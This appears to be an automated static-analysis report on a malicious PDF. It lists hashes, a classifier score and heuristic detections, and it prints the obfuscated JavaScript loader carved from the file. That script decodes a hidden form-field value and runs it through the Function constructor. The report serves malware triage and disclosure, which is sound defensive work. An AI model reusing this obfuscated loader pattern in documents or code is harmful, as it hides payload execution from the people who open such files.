Malicious PDF — malware analysis report

Static analysis result for SHA-256 55e9d75289d30832…

MALICIOUS

PDF

49.9 KB Created: 2012-07-17 07:52:10 +04:00 Authoring application: Adobe Acrobat 7.0 (via Adobe Acrobat 7.0 Image Conversion Plug-in) First seen: 2026-05-04
MD5: 25a28a35ce413903dc532834b930c81b SHA-1: 3abf8abeb76d1e35cd60b5905bbe583c9d92e0a7 SHA-256: 55e9d75289d308321373db56c71151c1cfb8b0decea4a3d0a5c83c77df560c5d
118 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file was flagged as malicious by an ML classifier with high confidence. Static analysis revealed embedded JavaScript, including the use of String.fromCharCode, indicating obfuscation. The presence of a JavaScript action and an embedded JS stream, along with the extracted artifact 'javascript_obj0106_000.js', strongly suggests that the script is designed to download and execute a second-stage payload. The document body was unreadable, so the rationale is based solely on the script and heuristics.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9971

Heuristics 5

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function shfdsfvsdfvdsfgds(str){return str.replace(/:/g,",");}
function fdshwergdsfgdsfg(asd){return String.fromCharCode(asd);}
function erhgsdfgdsgdsf(eds){var set='';var s=eds;
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0106_000.js pdf-javascript-stream PDF /JS object 106 at offset 0xC3CF 1607 bytes
SHA-256: 928b52128f401d7d3e6da5d3db5039f40605ccde726a343774074d86738164b5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function rhjahahagk(){
function bsdgdbdsfvsgfsadf(str){var set='';var s='';var ee='';
str = shfdsfvsdfvdsfgds(str);
str = str.split(",");
for(var i=0;i<str.length;i++){  
ee=str[i]/(18/6);
set+=erhgsdfgdsgdsf(ee.toString(64/4));}
return set;}
function hwegfgdsgdsfgds(hex) {
    var str = '';var zzz=fdshwergdsfgdsfg;
    for (var i = 0; i < hex.length; i += 2){
	var sssss = hex.substr(i,2);
       str +=fdshwergdsfgdsfg('asdfwefwuiegfyuadsui0x'.substr(20,2)+sssss);
}return str;}
function wggsadfsadf(input2) {var asdf =bsdgdbdsfvsgfsadf(input2) ; var asfdsad = hwegfgdsgdsfgds(asdf); return asfdsad;}
function ergtrgsgdsfgdfsg(sadsfjkgAD){var jdhjkashfhaui = "0"; return jdhjkashfhaui+sadsfjkgAD;}
function shfdsfvsdfvdsfgds(str){return str.replace(/:/g,",");}
function fdshwergdsfgdsfg(asd){return String.fromCharCode(asd);}
function erhgsdfgdsgdsf(eds){var set='';var s=eds;
if (s.length<2)
{set=ergtrgsgdsfgdfsg(s);}
else{set=s;}
return set;}
function ghsgffsadfsadf(d,dd){return d+dd;}
var b2=getField("Text1");
var aDFsdfasd=b2.value;
var aDFsdfasd=wggsadfsadf(aDFsdfasd);
function fjkasdf(){return "constr"+"uctor";}
var czvhjashavsiodhvuipashcpioasdcs  = app.alert[fjkasdf()];
function asdfeaf(s){if (s==0){return false+""}else{return true+""}}
var susea=asdfeaf(1);var seasus=asdfeaf(0);
var daeaefe="eafadsfjekafhjkavadfefafaef";
var argqrgqadsfwqgwafdsfwef=susea[(3+3)/2];
argqrgqadsfwqgwafdsfwef+=daeaefe[(16+16)/2];
argqrgqadsfwqgwafdsfwef+=seasus[((1+9)/5)-1];
argqrgqadsfwqgwafdsfwef+=seasus[(2+10)/6];
czvhjashavsiodhvuipashcpioasdcs[argqrgqadsfwqgwafdsfwef](aDFsdfasd);
}
rhjahahagk();

Open this report in the interactive analyzer, or submit your own file for analysis.